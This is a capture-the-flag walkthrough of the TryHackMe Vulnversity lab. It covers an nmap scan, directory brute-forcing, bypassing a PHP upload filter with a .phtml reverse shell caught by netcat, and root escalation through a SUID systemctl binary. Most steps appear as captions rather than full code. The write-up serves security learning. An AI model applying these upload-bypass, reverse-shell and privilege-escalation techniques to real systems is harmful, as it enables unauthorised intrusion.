TryHackMe — Vulnversity

TryHackMe — Vulnversity
  • A TryHackMe account.
  • Kali, Parrot, or any other Linux-based OS with the required tools installed. This will be our attacking machine. I will be using Kali Linux but you can use any other OS too.
  • Hands-on experience on Linux.
  • Learning & curious attitude.
  • Download your ovpn file, generally, it is named as your_username.ovpn
  • Open a terminal and navigate to the directory where ovpn file has been downloaded.
Connecting to VPN
  • When you are successfully connected to the VPN, you will see something like Initialization Sequence Completed
Initialization Sequence Completed
  • Now you can deploy the machine by clicking Deploy Machine button. Once you clicked, your machine will be started within two minutes.
  • Try to ping the machine.
Pinging the Machine
  • Scanning the box using nmap.
sudo nmap -sC -sV -p- --min-rate=5000 10.10.138.148
Full Nmap Scan
  • Port 21 running FTP server of version vsftpd 3.0.3 Found XSS & CSRF vulnerability with a very less CVE score and might not lead to remote code execution.
  • Port 22 running ssh service of version OpenSSH 7.2p2 which led me to an exploit on exploitdb. This exploit allows enumerating users on the server. We will keep this in mind and will get back to it (if required).
  • Port 139 & port 445 running netbios-ssn of version smbd 3.x — 4.x & smbd 4.3.11-Ubuntu respectively. Found Samba is_known_pipename() Arbitrary Module Load vulnerability which requires valid credentials and a writable folder. So far, we don’t have credentials therefore we cannot proceed with this approach.
  • Port 3128 running http-proxy of version squid 3.5.12 Found several vulnerabilities like buffer-overflow in squid-cache, insufficient verification of data-authenticity in squid-cache. These sounds like great vulnerabilities but we cannot start from here too.
  • Port 3333 running a webserver of version Apache httpd 2.4.18 Got some more information like http-server-header Apache/2.4.18 Ubuntu http-title Vuln University
  • Got some more information about the smb We will discuss this later if required.
  • Scan the box, how many ports are open?
6
  • What version of the squid proxy is running on the machine?
3.5.12
  • How many ports will nmap scan if the flag -p-400 was used?
400
  • Using the nmap flag -n what will it not resolve?
DNS
  • What is the most likely operating system this machine is running?
Ubuntu
  • What port is the webserver running on?
3333
Note: I had to restart my Vulnversity machine and got a different IP 
Earlier IP: 10.10.138.148
Current IP: 10.10.89.96
dirsearch output
  • What is the directory that has an upload form page?
/internal/
http://10.10.89.96:3333/css
http://10.10.89.96:3333/fonts
http://10.10.89.96:3333/js
http://10.10.89.96:3333/internal
Note: I checked files of other urls too but did not find anything interesting.Please search those files once, maybe you get something that I missed.
tun0 IP
Editing php-reverse-shell.php
Extension not allowed
Intercepted request in intruder
Selecting php (remember dot is not selected)
Entered different extension
phtml worked!!
Successfully uploaded php-reverse-shell.phtml
Found upload directory!!
php-reverse-shell.phtml file found!!
nc shell listening on port 55555
Shell
user.txt flag
  • Try upload a few file types to the server, what common extension seems to be blocked?
.php
  • Run this attack, what extension is allowed?
.phtml
  • What is the name of the user who manages the webserver?
bill
  • What is the user flag?
8bd79[REDACTED]
Enumeration
find / -perm -u=s -type f 2>/dev/null
SUID files
Permission of /bin/systemctl file
Writing service to read /root/root.txt flag
  • On the system, search for all SUID files. What file stands out?
/bin/systemctl
  • Become root and get the last flag (/root/root.txt)
a58ff[REDACTED]

--

--

--

Security Researcher | Bibliophile | Thinker

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Oxfam GB Helps At-Risk Communities Respond to COVID-19 with Odaseva

Remembering 2018’s Most Prominent Data Breaches

Total Autonomy, or an April Fools’ Joke?

Artificial Intelligence, Cybersecurity & Smart Grid Cyborgs

February 2022: Standing together, sharing the love

From the Launchpad—February Mission Update

Sharpen Your Cybersafety Arsenal

Cyber Physical System (CPS) Global Center

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Aakash Kumar

Aakash Kumar

Security Researcher | Bibliophile | Thinker

More from Medium

Windows 11 Clean Installation

CardanoPy: Operate and Extend Cardano Nodes Using a Python CLI

Bypassing antivirus software with venom and shellter.

Origin DNS error |